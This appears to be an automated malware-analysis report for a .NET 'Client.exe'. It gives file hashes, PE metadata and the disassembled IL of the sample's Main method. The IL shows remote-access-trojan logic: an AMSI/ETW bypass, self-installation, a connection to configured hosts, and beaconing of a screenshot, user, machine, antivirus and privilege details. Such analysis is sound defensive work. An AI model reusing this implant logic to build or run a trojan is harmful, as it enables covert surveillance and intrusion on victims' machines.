Symbol Ofbuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | b3ffa944afc48373b1dd10eda1ca6919
|
| Sha1 | 76d80e4e15f2d71352fbdd1340f6857e5ca7baa5
|
| Sha256 | 4583381950d39798763f2d11ea1766b4f0da29acb2b3e41ea4889c74c820f33e
|
| Sha384 | 5ab969c5cd79d4da60644c00674c332e40c92c7c7d8d23ca75259aa233fdade9fc6ee1303c1ef729cf1726ad9c4673e6
|
| Sha512 | 00b0acd48914f8a5177bbaf05e30b7a51bd702084b53e972e67db7f96e9728f5e7c388121829431203c7b1ff46216a60940e622ed7c6be55eccf500667ceb37b
|
| SSDeep | 3072:dxEHTU/Ue9hMUKPh1fFuJ0+Jd5vbXaxTEN1tE3iIBhOblUpignfEGaKXtTlQ1q:Qvh1M0u5zXm4+bBwbI1aetTi
|
| TLSH | D0167B4237443B9FDAEFE6FA01430E5C05E451EF06037A9EBBCA49F05548B54A217BBA
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Info | Overlay extracted: Overlay_9045e166.bin (3897856 bytes) |
| Module Name | Client.exe |
| Full Name | Client.exe |
| EntryPoint | System.Void Client.Program::Main(System.String[]) |
| Scope Name | Client.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Client |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.0 |
| Total Strings | 290 |
| Main Method | System.Void Client.Program::Main(System.String[]) |
| Main IL Instruction Count | 149 |
| Main IL | call System.Void Client.Config::Init() call System.Void Client.Helper.AsmiAndETW::Bypass() ldsfld System.String Client.Config::Install ldstr dspi call System.String Client.Helper.EncryptString::Decode(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0025: ldsfld System.String Client.Config::Mutex call System.Void Client.Helper.Install::Run() ldsfld System.String Client.Config::Mutex call System.Boolean Client.Helper.MutexControl::CreateMutex(System.String) brfalse IL_01A7: leave.s IL_01AC call System.Void Client.Helper.Methods::MaxPriority() call System.Void Client.Helper.Methods::PreventSleep() ldsfld Client.Helper.Client Client.Program::client ldfld System.Boolean Client.Helper.Client::itsConnect brtrue IL_0198: ldc.i4 200 ldsfld System.String Client.Config::Hosts ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 59 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.0 <null> ldloc.0 <null> ldsfld System.Random Client.Helper.Methods::random ldloc.0 <null> ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.1 <null> ldloc.1 <null> ldc.i4.1 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.2 <null> ldsfld Client.Helper.Client Client.Program::client callvirt System.Void Client.Helper.Client::Disconnect() ldsfld Client.Helper.Client Client.Program::client ldloc.1 <null> ldc.i4.0 <null> ldelem.ref <null> ldloc.2 <null> ldsfld System.Random Client.Helper.Methods::random ldloc.2 <null> ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> callvirt System.Void Client.Helper.Client::Connect(System.String,System.String) ldsfld Client.Helper.Client Client.Program::client ldfld System.Boolean Client.Helper.Client::itsConnect brfalse IL_0198: ldc.i4 200 ldsfld Client.Helper.Client Client.Program::client ldsfld Client.Helper.Client Client.Program::client newobj System.Void Client.Helper.PingChecker::.ctor(Client.Helper.Client) stfld Client.Helper.PingChecker Client.Helper.Client::pingChecker ldsfld Client.Helper.Client Client.Program::client ldsfld Client.Helper.Client Client.Program::client newobj System.Void Client.Helper.LastPing::.ctor(Client.Helper.Client) stfld Client.Helper.LastPing Client.Helper.Client::lastPing ldsfld Client.Helper.Client Client.Program::client ldc.i4.s 14 newarr System.Object dup <null> ldc.i4.0 <null> ldstr L:ZZibd call System.String Client.Helper.EncryptString::Decode(System.String) stelem.ref <null> dup <null> ldc.i4.1 <null> call System.Byte[] Client.Helper.Methods::CaptureResizeReduceQuality() stelem.ref <null> dup <null> ldc.i4.2 <null> ldsfld System.String Client.Config::Group stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String Client.Config::Hwid stelem.ref <null> dup <null> ldc.i4.4 <null> call System.String System.Environment::get_UserName() ldstr f2f call System.String Client.Helper.EncryptString::Decode(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String Client.Config::Camera stelem.ref <null> dup <null> ldc.i4.6 <null> ldsfld System.String Client.Config::Cpu stelem.ref <null> dup <null> ldc.i4.7 <null> ldsfld System.String Client.Config::Gpu stelem.ref <null> dup <null> ldc.i4.8 <null> ldsfld System.String Client.Config::WindowsVersion stelem.ref <null> dup <null> ldc.i4.s 9 ldsfld System.String Client.Config::AntiVirus stelem.ref <null> dup <null> ldc.i4.s 10 ldsfld System.String Client.Config::Version stelem.ref <null> dup <null> ldc.i4.s 11 ldsfld System.String Client.Config::DataInstall stelem.ref <null> dup <null> ldc.i4.s 12 ldsfld System.String Client.Config::Privilege stelem.ref <null> dup <null> ldc.i4.s 13 call System.String Client.Helper.Methods::GetActiveWindowTitle() stelem.ref <null> call System.Byte[] Leb128.LEB128::Write(System.Object[]) callvirt System.Void Client.Helper.Client::Send(System.Byte[]) ldc.i4 200 call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_003E: ldsfld Client.Helper.Client Client.Program::client leave.s IL_01AC: ret pop <null> leave.s IL_01AC: ret ret <null> |